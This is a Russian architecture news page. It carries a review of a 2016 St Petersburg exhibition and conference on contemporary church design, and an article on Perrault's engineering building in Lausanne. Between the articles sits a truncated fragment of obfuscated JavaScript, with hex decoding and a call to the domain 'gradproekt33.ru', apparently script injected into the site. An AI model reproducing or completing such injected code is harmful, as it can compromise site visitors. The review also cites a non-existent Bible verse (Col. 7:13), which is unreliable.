Новости


18.06.2016 Храмы города Питера

Ирина Бембель – о современной храмовой архитектуре, показанной союзом архитекторов на выставке и обсуждённой на конференции в мае.

Выставка

Выставка церковных проектов в Доме архитектора Санкт-Петербурга. Фото: Кирилл Санталов
Выставка церковных проектов в Доме архитектора Санкт-Петербурга. Фото: Кирилл Санталов

Во второй половине месяца мая в Петербурге была показана выставка церковных проектов петербургских архитекторов, организованная комиссией союза архитекторов города по церковной архитектуре при участии СРО НП ГАИП, епархиальной комиссии по архитектурно-художественным вопросам и петербургского отделения МААМ.

В отличие от первой выставки церковных проектов весной 2011 года, нынешняя экспозиция была построена на материале последних пяти лет. Соответственно работ было меньше: тридцать планшетов, включая студенческие проекты. Не всё актуальное и заметное удалось собрать и тем не менее получился достаточно объективный срез, по которому можно судить о положении дел в нашем храмоздательстве.

Как и ранее, спектр авторских поисков колебался от строгих исторических стилизаций до экспериментов, впрочем, без радикализма. Признаюсь, наибольшую симпатию у меня вызвали деликатные исторические реплики, хотя теоретически нельзя не согласиться, что церковная архитектура должна естественно развиваться, как это было во все времена. Понравилась деревянная церковь Антона Головина в традиции, характерной для Карельского перешейка рубежа XIX и XX веков.
Храм Вознесения Господня в поселке Гвардейское Ленинградской области. Архитектурная мастерская Головина и Шретера. Изображение предоставлено Комиссией по церковной архитектуре СА СПб
Храм Вознесения Господня в поселке Гвардейское Ленинградской области. Архитектурная мастерская Головина и Шретера. Изображение предоставлено Комиссией по церковной архитектуре СА СПб открыть большое изображение

Убедительной выглядела и нарядная импровизация Геннадия Фомичёва на тему раннего классицизма, а также изящный проект Георгия Бойко, вдохновлявшегося петровской эпохой. Помимо индивидуальных качеств, в этих работах привлекает отход их авторов от усреднённого тоновского шаблона и бездумного тиражирования церкви Покрова на Нерли.

Как-то сложилось, что названные образцы потеснили всё неисчерпаемое богатство русской традиции от домонгольской старины и русского севера до белокаменной Москвы и петербургского модерна. Воспроизведённые в бетоне, без оглядки на контекст, с крикливым нитрид-титановым златоглавием и режущими глаз линиями и углами, они стали собирательным образом суррогатной традиции и лёгким путём, ведущим в тупик. К счастью, эти упрёки не относятся к участникам выставки.
Свято-Успенский храм. Поселок Барышево. Выборгский район. Архитектурная мастерская Г.П. Фомичева. Изображение предоставлено Комиссией по церковной архитектуре СА СПб
Свято-Успенский храм. Поселок Барышево. Выборгский район. Архитектурная мастерская Г.П. Фомичева. Изображение предоставлено Комиссией по церковной архитектуре СА СПб открыть большое изображение
Церковь Успения Богородицы на Невском Пятачке. Ленинградская область. Фасады, разрезы, планы. Архитектор Георгий Бойко. Изображение предоставлено Комиссией по церковной архитектуре СА СПб
Церковь Успения Богородицы на Невском Пятачке. Ленинградская область. Фасады, разрезы, планы. Архитектор Георгий Бойко. Изображение предоставлено Комиссией по церковной архитектуре СА СПб открыть большое изображение

К названной группе примыкают проекты Кирилла Яковлева (АМ «Тектоника»), хотя его церковь в Нагово демонстрирует большую свободу в ориентации на образцы, нежели классицистический храм в Цвылёво.
Церковь Св. Иоанна Богослова в п. Нагово, Новгородская область. АМ «Тектоника». Изображение предоставлено Комиссией по церковной архитектуре СА СПб
Церковь Св. Иоанна Богослова в п. Нагово, Новгородская область. АМ «Тектоника». Изображение предоставлено Комиссией по церковной архитектуре СА СПб открыть большое изображение
Церковь Св. Иоанна Богослова в поселке Нагово. Новгородская область. Планы и фасады. АМ «Тектоника». Изображение предоставлено Комиссией по церковной архитектуре СА СПб
Церковь Св. Иоанна Богослова в поселке Нагово. Новгородская область. Планы и фасады. АМ «Тектоника». Изображение предоставлено Комиссией по церковной архитектуре СА СПб открыть большое изображение
Храм-памятник Св. Георгия Победоносца в поселке Цвылево, Ленинградская область. АМ «Тектоника». Изображение предоставлено Комиссией по церковной архитектуре СА СПб
Храм-памятник Св. Георгия Победоносца в поселке Цвылево, Ленинградская область. АМ «Тектоника». Изображение предоставлено Комиссией по церковной архитектуре СА СПб открыть большое изображение

Особняком стояли храмы Максима Атаянца для Армении: построенные в местной традиции из туфа, травертина, базальта, они словно срослись с природным окружением и лет через пятьдесят, как представляется, будут трудноотличимы от исторических прообразов.
Храм св. Иоанна Крестителя. Село Караглух, Армения. Архитектор Максим Атаянц, авторский надзор Манушак Титанян, строительство Григор Варданян. Изображение предоставлено Комиссией по церковной архитектуре СА СПб
Храм св. Иоанна Крестителя. Село Караглух, Армения. Архитектор Максим Атаянц, авторский надзор Манушак Титанян, строительство Григор Варданян. Изображение предоставлено Комиссией по церковной архитектуре СА СПб открыть большое изображение
Церковь в Дилижане, Армения. Проект, 2016. Архитектор Максим Атаянц. Изображение предоставлено Комиссией по церковной архитектуре СА СПб
Церковь в Дилижане, Армения. Проект, 2016. Архитектор Максим Атаянц. Изображение предоставлено Комиссией по церковной архитектуре СА СПб открыть большое изображение
Церковь в Дилижане, Армения. Интерьер. Проект, 2016. Архитектор Максим Атаянц. Изображение предоставлено Комиссией по церковной архитектуре СА СПб
Церковь в Дилижане, Армения. Интерьер. Проект, 2016. Архитектор Максим Атаянц. Изображение предоставлено Комиссией по церковной архитектуре СА СПб открыть большое изображение

Разнонаправленные поиски путей обновления традиции показал Михаил Мамошин. Эскизное решение для юга Петербурга сочетает приёмы разных русских школ – владимиро-суздальской, псковско-новгородской и московско-ярославской, предлагая собственную версию собирательного образа русского храма, тогда как проект в Колпино своей геометрической линейностью осторожно апеллирует к авангарду.
Князь-Владимирский храм на юге Петербурга. Проект, 2015. Архитектор Михаил Мамошин. Изображение предоставлено Комиссией по церковной архитектуре СА СПб
Князь-Владимирский храм на юге Петербурга. Проект, 2015. Архитектор Михаил Мамошин. Изображение предоставлено Комиссией по церковной архитектуре СА СПб открыть большое изображение
Храм Сошествия Святого Духа в Колпино. Проект, 2016. Архитектор Михаил Мамошин. Изображение предоставлено Комиссией по церковной архитектуре СА СПб
Храм Сошествия Святого Духа в Колпино. Проект, 2016. Архитектор Михаил Мамошин. Изображение предоставлено Комиссией по церковной архитектуре СА СПб открыть большое изображение

Изысканный геометризм, вносящий современное дыхание в традиционные формы, присущ и грандиозному храмовому комплексу Николая Чудотворца в Ленобласти, проект которого в красивой технике ручной отмывки представил дипломник института им. И.Е. Репина Илья Пушкин.
Храмовый комплекс и реабилитационный центр Святителя Николая Чудотворца, Ленинградская область. Проект, 2016. Архитектор Илья Пушкин. Изображение предоставлено Комиссией по церковной архитектуре СА СПб
Храмовый комплекс и реабилитационный центр Святителя Николая Чудотворца, Ленинградская область. Проект, 2016. Архитектор Илья Пушкин. Изображение предоставлено Комиссией по церковной архитектуре СА СПб открыть большое изображение
Храмовый комплекс и реабилитационный центр Святителя Николая Чудотворца, Ленинградская область. Генеральный план. Архитектор Илья Пушкин. Изображение предоставлено Комиссией по церковной архитектуре СА СПб
Храмовый комплекс и реабилитационный центр Святителя Николая Чудотворца, Ленинградская область. Генеральный план. Архитектор Илья Пушкин. Изображение предоставлено Комиссией по церковной архитектуре СА СПб открыть большое изображение
Храмовый комплекс и реабилитационный центр Святителя Николая Чудотворца, Ленинградская область. Проект интерьера. Архитектор Илья Пушкин. Изображение предоставлено Комиссией по церковной архитектуре СА СПб
Храмовый комплекс и реабилитационный центр Святителя Николая Чудотворца, Ленинградская область. Проект интерьера. Архитектор Илья Пушкин. Изображение предоставлено Комиссией по церковной архитектуре СА СПб открыть большое изображение

Стремление к благородной простоте на стыке архаики и «сурового стиля» характеризует монументальные работы Ивана Уралова и мастерской «Северная пчела». Объём церкви в Зеленогорске, в целом традиционный, имеет необычную линию карниза, который на боковых фасадах рисует «волну» в направлении алтаря. На мой взгляд, здесь заложено некое противоречие, поскольку горизонтальное движение в принципе не свойственно образу храма. Он по определению статичен, устойчив, поскольку движение – это свойство времени, а храм апеллирует к вечности. Поэтому естественное его устремление – вверх.

Этой статикой и вертикальной устремлённостью, напротив, обладает проект церковного комплекса в Малиновке с прекрасной идеей «райского сада»-оранжереи.
Храм во имя Святой Блаженной Ксении Петербургской в Сестрорецке. АМ «Северная пчела». Изображение предоставлено Комиссией по церковной архитектуре СА СПб
Храм во имя Святой Блаженной Ксении Петербургской в Сестрорецке. АМ «Северная пчела». Изображение предоставлено Комиссией по церковной архитектуре СА СПб открыть большое изображение
Проект храма Св. Жен Мироносиц в Малиновке, Санкт-Петербург. АМ «Северная пчела». Изображение предоставлено Комиссией по церковной архитектуре СА СПб
Проект храма Св. Жен Мироносиц в Малиновке, Санкт-Петербург. АМ «Северная пчела». Изображение предоставлено Комиссией по церковной архитектуре СА СПб открыть большое изображение
Проект храма Св. Жен Мироносиц в Малиновке, Санкт-Петербург. Фасады, разрезы. АМ «Северная пчела». Изображение предоставлено Комиссией по церковной архитектуре СА СПб
Проект храма Св. Жен Мироносиц в Малиновке, Санкт-Петербург. Фасады, разрезы. АМ «Северная пчела». Изображение предоставлено Комиссией по церковной архитектуре СА СПб открыть большое изображение

Несмотря на заявленные вначале консервативные симпатии, интересной и обоснованной показалась мне и экспериментальная концепция Романа Муравьёва, представляющая собой поиск образа современной храмовой доминанты среди масштабной городской застройки – задача более чем актуальная. Предложенный автором проект храма с просветительским центром представляет собой одиннадцатиэтажный комплекс (без технического этажа), центральную часть которого занимает церковь, тогда как остальное пространство отдано учебным классам, библиотеке, трапезным и другим вспомогательным помещениям.
Проект 11-этажной церкви в Малиновке. Архитектор Роман Муравьев. Изображение предоставлено Комиссией по церковной архитектуре СА СПб
Проект 11-этажной церкви в Малиновке. Архитектор Роман Муравьев. Изображение предоставлено Комиссией по церковной архитектуре СА СПб открыть большое изображение

Святослав Гайкович, выступивший на конференции с полемическими тезисами, создал, тем не менее, вполне каноничную композицию из четверика с колокольней. Вместе с тем, язык его храма по-современному заострён; обыграны выразительные свойства бетона, который честно заявляет о себе, не маскируясь под камень. В итоге получилось сильное высказывание, выгодно отличающееся от упомянутых вначале аморфных тоновских реплик. В то же время этот линейный лаконизм бетонных стен представляется мне чрезмерно суровым для храма как образа рая на земле.
Храм Преображения Господня. Санкт-Петербург. Архитектор Святослав Гайкович. Изображение предоставлено Комиссией по церковной архитектуре СА СПб
Храм Преображения Господня. Санкт-Петербург. Архитектор Святослав Гайкович. Изображение предоставлено Комиссией по церковной архитектуре СА СПб открыть большое изображение
Храм Преображения Господня. Санкт-Петербург. Проект интерьера. Архитектор Святослав Гайкович. Изображение предоставлено Комиссией по церковной архитектуре СА СПб
Храм Преображения Господня. Санкт-Петербург. Проект интерьера. Архитектор Святослав Гайкович. Изображение предоставлено Комиссией по церковной архитектуре СА СПб открыть большое изображение

Не ставя целью остановиться на каждом проекте, хочу выразить коллективную благодарность студентам (в первую очередь, СПбГАСУ) за активное участие и высокий уровень представленных проектов.

Также не могу не упомянуть работы, отразившие, с моей точки зрения, негативные тенденции нашего храмоздательства.

Так, проектное решение мастерской «Снегири», в моём понимании, искажает антропоморфность сакральной символики храма. В своём послании Колоссянам апостол Павел называет Церковь Телом Христовым, а Христа – главою Церкви (Кол. 7:13). В данном случае тело храма вместо привычного стройного и «плечистого» четверика представляет собой треугольную пирамиду с вогнутыми бетонными стенами, оставляя впечатление противоестественной деформации. Между тем, в активе мастерской есть вполне традиционный, и, на мой взгляд, удачный проект храма Архангела Михаила для посёлка Ляскеля в Карелии.

Образцом помпезного официоза показался проект «Студии-55» для парка 300-летия Петербурга...
Церковь Святителя Николая. АМ «Снегири». Изображение предоставлено Комиссией по церковной архитектуре СА СПб
Церковь Святителя Николая. АМ «Снегири». Изображение предоставлено Комиссией по церковной архитектуре СА СПб открыть большое изображение
Проект храма Всех Святых в парке 300-летия С-Петербурга. АМ «Союз-55». Изображение предоставлено Комиссией по церковной архитектуре СА СПб
Проект храма Всех Святых в парке 300-летия С-Петербурга. АМ «Союз-55». Изображение предоставлено Комиссией по церковной архитектуре СА СПб открыть большое изображение
Прект храма Св. Георгия Победоносца в поселке Ново-Токсово, Ленинградская область. АМ «Ким и Харитоненко». Изображение предоставлено Комиссией по церковной архитектуре СА СПб
Прект храма Св. Георгия Победоносца в поселке Ново-Токсово, Ленинградская область. АМ «Ким и Харитоненко». Изображение предоставлено Комиссией по церковной архитектуре СА СПб открыть большое изображение
Часовня-храм в честь Собора новомучеников в Сочи. АМ «Группа-А». Изображение предоставлено Комиссией по церковной архитектуре СА СПб
Часовня-храм в честь Собора новомучеников в Сочи. АМ «Группа-А». Изображение предоставлено Комиссией по церковной архитектуре СА СПб открыть большое изображение
Проект храмового комплекса. Архитектор Е. Игнатова, студентка СПбГАСУ. Изображение предоставлено Комиссией по церковной архитектуре СА СПб
Проект храмового комплекса. Архитектор Е. Игнатова, студентка СПбГАСУ. Изображение предоставлено Комиссией по церковной архитектуре СА СПб открыть большое изображение
Проект храмового комплекса. Архитектор В. Бобров, студент СПбГАСУ. Изображение предоставлено Комиссией по церковной архитектуре СА СПб
Проект храмового комплекса. Архитектор В. Бобров, студент СПбГАСУ. Изображение предоставлено Комиссией по церковной архитектуре СА СПб открыть большое изображение
Проект храмового комплекса. Архитектор В. Юркевич, студент СПбГАСУ. Изображение предоставлено Комиссией по церковной архитектуре СА СПб
Проект храмового комплекса. Архитектор В. Юркевич, студент СПбГАСУ. Изображение предоставлено Комиссией по церковной архитектуре СА СПб открыть большое изображение
Проект храмового комплекса. Архитектор А. Хилькевич, студентка СПбГАСУ. Изображение предоставлено Комиссией по церковной архитектуре СА СПб
Проект храмового комплекса. Архитектор А. Хилькевич, студентка СПбГАСУ. Изображение предоставлено Комиссией по церковной архитектуре СА СПб открыть большое изображение
Проект храмового комплекса. Архитектор Н. Стребков, студент СПбГАСУ. Изображение предоставлено Комиссией по церковной архитектуре СА СПб
Проект храмового комплекса. Архитектор Н. Стребков, студент СПбГАСУ. Изображение предоставлено Комиссией по церковной архитектуре СА СПб открыть большое изображение


***

Конференция
Конференция по современной церковной архитектуре в Доме архитектуры Санкт-Петербурга. Александр Есаулов, Ирина Бембель, Александр Макаров, Олег Романов. Фото: Кирилл Санталов
Конференция по современной церковной архитектуре в Доме архитектуры Санкт-Петербурга. Александр Есаулов, Ирина Бембель, Александр Макаров, Олег Романов. Фото: Кирилл Санталов

Научно-практическая конференция «Современная церковная архитектура: тенденции, проблемы, возможности» состоялась 23-24 мая. Помимо упомянутых вначале партнёров, соорганизатором и главным информационным спонсором мероприятия выступил журнал «Капитель». В рамках конференции состоялась двухдневная выставка работ польского православного архитектора Ежи Устиновича. +

Одной из своих главных кураторских задач я считала создание общей площадки для встречи архитекторов, представителей Церкви, градостроителей, а также теоретиков, которые смогли бы систематизировать и осмыслять накопившийся материал. Ведь очевидно, что только общий слаженный диалог может создать предпосылки для полноценного развития храмовой архитектуры. Столь же очевидно, что на сегодняшний день эти сферы практически изолированы друг от друга.
Конференция по современной церковной архитектуре в Доме архитектуры Санкт-Петербурга
Конференция по современной церковной архитектуре в Доме архитектуры Санкт-Петербурга открыть большое изображение

Каждый из предложенных вопросов представляется важным и достойным отдельной конференции, но поскольку на данный момент церковная проблематика вообще вынесена за скобки большой архитектурной дискуссии – важно было хотя бы обозначить важнейшие направления, чтобы привлечь к ним внимание специалистов. Очень обобщённо эти направления можно свести к двум глобальным темам: первая – тема стиля и языка современного храма, вторая – его градостроительная роль. В соответствии с этим, помимо заседаний, на конференции было организовано два круглых стола.
Круглый стол. Слева направо: Олег Романов, Михаил Микишатьев, Александр Макаров. Фото: Кирилл Санталов
Круглый стол. Слева направо: Олег Романов, Михаил Микишатьев, Александр Макаров. Фото: Кирилл Санталов

Важнейшей проблемой в сфере петербургской церковной архитектуры на сегодняшний день, без сомнения, является градостроительный аспект. Функциональная уникальность храмов, их важная культурная и социальная роль способны притянуть жизнь в депрессивные районы и аккумулировать активность их жителей на прилегающем пространстве. Иными словами, храм может стать одной из предпосылок возникновения локальных центров и деятельным инструментом упорядочения рыхлой застройки новых районов. Безусловно, для этого он должен иметь подобающее градостроительное звучание, то есть располагаться не на случайном участке и иметь значительное прилегающее пространство. Так исторически формировался костяк любого города, однако сегодня градостроительный потенциал церквей абсолютно не задействован. От этого проигрывают и город, и храмы. Участие в «градостроительном» круглом столе главного архитектора Санкт-Петербурга Владимира Григорьева позволяет надеяться, что КГА, наконец, обратит должное внимание на этот стихийно развивающийся сектор архитектуры.

Вторая тема – языка и стиля – также связана с исключительными задачами, которые ставит перед архитектором храм. Исторически это обеспечивало сакральному зодчеству главенствующую роль в архитектурной иерархии. Представляется, что и сегодня храмоздательство может стать уникальным стимулом для развития нашей архитектуры.

Безусловно, вопрос этот не только художественный, и формальным анализом соотношения «традиции и новации» здесь не обойтись. Об этом в своём глубоком докладе напомнил наш польский гость Ежи Устинович, подробно остановившись на богословском обосновании церковной символики. Стремление к обожению, деятельная духовная работа должна предшествовать формальным поискам архитектора, который призван быть проводником и свидетелем живой Истины, а не фантазёром и не копиистом. И ложно понятая свобода, и формальное рабство равно далеки от задач храмовой архитектуры.
Архитектор Михаил Мамошин приветствует польского гостя Ежи Устиновича. Фото: Кирилл Санталов
Архитектор Михаил Мамошин приветствует польского гостя Ежи Устиновича. Фото: Кирилл Санталов

Большим достижением организаторов я считаю участие в конференции и заинтересованность в диалоге представителей духовенства. В силу установки на диалог доклады получились несколько разнонаправленными: каждый представитель названных групп говорил на своём языке, а все вместе, открывая для себя новое, учились слушать и понимать друг друга. Лично мне выбранный формат представляется единственно верным и имеющим большой потенциал.

Хочу сказать огромное спасибо всем нашим докладчикам, в том числе гостям из Москвы, Белоруссии, Латвии и Польши. Организаторы надеются, что такого рода мероприятия станут традицией.+
Доклад иерея Сергия (Кубышкина). Фото: Кирилл Санталов
Доклад иерея Сергия (Кубышкина). Фото: Кирилл Санталов
Источник: archi.ru
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "gradproekt33.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

 

 
15.06.2016 Разрушить, чтобы воссоздать

Инженерный корпус Федеральной политехнической школы в Лозанне по проекту Доминика Перро.

«Политехника» в Лозанне – образовательный центр с долгой историей: более 150 лет. Сейчас школа является одним из лучших инженерных вузов в мире. Новый этап её развития начался в 2000-х годах, когда одновременно с реформой институциональной структуры школы началась и масштабная реконструкция кампуса.

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp открыть большое изображение

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp открыть большое изображение

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp открыть большое изображение

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp открыть большое изображение

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp открыть большое изображение


Право на постройку двух корпусов – центральной библиотеки (корпус BI) и инженерного корпуса – в результате конкурса в 2011 досталось французскому архитектору Доминику Перро, которому на родине не побоялись в свое время доверить работу над зданиями Министерства обороны и Национальной библиотеки, хотя его проект Второй сцены Мариинского театра в Санкт-Петербурге так и не был реализован.

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp открыть большое изображение

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp открыть большое изображение

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp открыть большое изображение

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp открыть большое изображение

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp открыть большое изображение


К строительству приступили уже в 2012. Первой была завершена разноцветная библиотека, а в 2016-м, как и планировалось, завершили инженерный корпус.

Концептуальной основой проекта стало сохранение смысловой и пространственной структуры старого модернистского корпуса, построенного в 1970-х годах. В начале XXI века здание изрядно обветшало, и поэтому его снесли, сохранив и усовершенствовав его структуру в новой «версии».

Здание инженерного корпуса – в первую очередь, экспериментальная площадка и лаборатория для исследователей, исходя из этого принципа формировалась его программа. Она решена максимально функционально: здесь расположился ряд важных лабораторий, аудитории и общественные пространства, административные помещения. Здание состоит из 4 уровней: первый – инфраструктурный – максимально интегрирован с тремя последующими, «функциональными».

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp открыть большое изображение

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp открыть большое изображение

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp открыть большое изображение

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp открыть большое изображение

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp открыть большое изображение

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp открыть большое изображение

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp открыть большое изображение

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp открыть большое изображение


Части корпуса независимы друг от друга в технических аспектах, но за счет атриума связаны в одно целое визуально и социально. Атриум – сердце нового здания и главная экспериментальная площадка. Большой и просторный, он служит не только для циркуляции и общения, но и рабочим пространством для студентов.

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp открыть большое изображение

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp открыть большое изображение

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp открыть большое изображение

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp открыть большое изображение

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp открыть большое изображение


Атриум сплошь пересечен лестницами-переходами, соединяющими противоположные стороны и этажи. Их паутина придает динамику минималистично решенному интерьеру. Палитра цветов – чёрный и белый в различных интерпретациях, матовых и полированных поверхностях. Чёрным выделены перила и лампы по дизайну Гаэль Лорьо-Прево (Gaëlle Lauriot-Prévos), установленные вдоль переходов. Дополнительные полосы и оттенки создает солнечный свет, проникающий через большой световой купол.

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp открыть большое изображение

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp открыть большое изображение

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp открыть большое изображение

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp открыть большое изображение

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp открыть большое изображение

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp открыть большое изображение


Архитекторы использовали необработанный бетон в сочетании с металлом, прозрачными и полупрозрачными перегородками. Это придает глубину пространству и формирует множество перспектив для зрителя.

Структура фасада сформирована двумя оболочками: внутренняя обеспечивает терморегуляцию и звукозащиту, внешняя – это панели из металлической сетки, натянутой на каркас, они отвечают за солнцезащиту. Внешняя оболочка разделена на модули из трех панелей, отклоненных от стен на угол в 5 градусов в противоположных направлениях, что делает фасад как будто плетеным. Верхняя панель каждого модуля закреплена неподвижно, а две нижние можно регулировать.

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp открыть большое изображение

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp открыть большое изображение

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp открыть большое изображение

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp открыть большое изображение

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp открыть большое изображение


Сетчатые панели – узнаваемый стиль Перро. Полюбившиеся ему еще во времена работы над проектом Национальной библиотеки Франции, она пришлась в Лозанне очень кстати, создав легкий, невесомый образ здания.

Ломанные поверхности трёх фасадов – образное воплощение «механики», а четвертый, северный фасад – отражение стоящего напротив здания. В центральной части панели взмывают вверх, открывают вход и формируют таким образом легкий навес.

Вечером многослойные перфорированные стены пропускают свет наружу, и инженерный корпус превращается в своеобразный маяк для всего кампуса.

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp открыть большое изображение

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp открыть большое изображение

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp открыть большое изображение

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp открыть большое изображение

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp открыть большое изображение

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp открыть большое изображение

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp

Инженерный корпус Федерального политехнического университета Лозанны © Vincent Fillon / Dominique Perrault Architecture / Adagp открыть большое изображение

